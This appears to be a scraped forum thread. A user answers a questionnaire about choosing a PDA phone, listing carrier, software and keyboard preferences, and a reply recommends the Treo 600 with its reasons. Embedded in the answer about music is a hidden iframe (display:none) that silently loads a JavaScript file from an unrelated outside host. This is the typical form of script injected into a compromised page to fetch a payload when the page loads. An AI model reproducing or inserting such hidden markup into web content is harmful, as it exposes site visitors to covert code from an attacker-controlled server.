Question Which PDA phone should I get?

1. What PDA and/or mobile phone do I use today?

Nokia Phone
Handspring Visor Prism w/visor phone-I LOVE THIS GADGET. The ability to dial directly from my address book is a must. It was like a dream come true.

2. Are locked into a mobile carrier (i.e. Verizon Wireless, Sprint PCS, etc.), or do you prefer a particular carrier? Do you know if one carrier has better coverage in places that you need to be?

I would prefer Cingular mainly so I can keep my number. I was very, very, very disappointed with t-mobile or whatever they were calling themselves a few years ago and have had to dump the pda phone. I want the regain the ability to use a pda phone with reliable voice service.

3. Where are you based? Do you stay in one place or travel a lot? Do you travel internationally... how much and where? Do you intend to use your pdaPhone there?

Houston, Texas, prefer nationwide long distance with roaming included even though I don't necessarily travel alot-I prefer the ability to travel with seamless service coverage.

4. Do have a preference of Palm, Pocket PC, Symbian, etc.?

I am most familiar with the palm system, but curious about pocket pc. Whatever can run my applications the best.

5. Are you likely to run it the way it came out of the box, or do you intend to load a whole lot of extra applications and stuff on it? Do you know of anything now that you will need to run?

Company software, address book and/or ACT! for palm and possible micosoft office applications-word etc. (I don't know if act is availble for pocket pc)

6. How important is data, and what would you use data for (i.e. web, email, remote terminal, etc.)?

not very-although may like once I learn more about it, again service must justify cost.

7. Do you do SMS messaging a lot?

Once, can't really justify paying extra for something most others may or may not have.

8. Do you need a GPS for mapping and navigation?

would be nice but not necessary

9. What is your size preference.. very close to the smallest cellphone, or you don’t care.. function over size?

Don't care, function most important. No larger than my laptop. I considered tablet PC but they still need alot of work.

10. How will you carry it... pocket, belt, purse, etc.?

purse, belt or pocket

11. Do you prefer a particular form factor… flip-phone, candy bar, etc?

No

12. Do you prefer a QWERTY keyboard, or are you cool with a stylus?

I prefer a built-in keyboard and/or stylus.

13. Do you want to play a lot of games? What kinds?

games are nice but not necessary

14. Do you want to listen to music? What kind... mp3, streamed, etc.?

music is nice but not necessary<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

It seems that the Treo 600 is the way to go. Handspring is taking orders on it for Cingular as we speak, with shipping in a week or so. Or, you could wait a few weeks for number portability and go with a Sprint version. I know that Sprint has better coverage in my area than Cingular. Also, I think you'll find T-Mobile to be comparable to Cingular now.

My reasoning for this recommendation is

a) you like Handspring already
b) you prefer Palm
c) you want good integrating and the Treo 600 is very well done
d) you would like Cingular and the Treo 600 is really the only choice with them, other than a Blackberry
e) you prefer a QWERTY keyboard
f) you are not looking for the smallest device at all costs, although the Treo 600 is one of the smallest
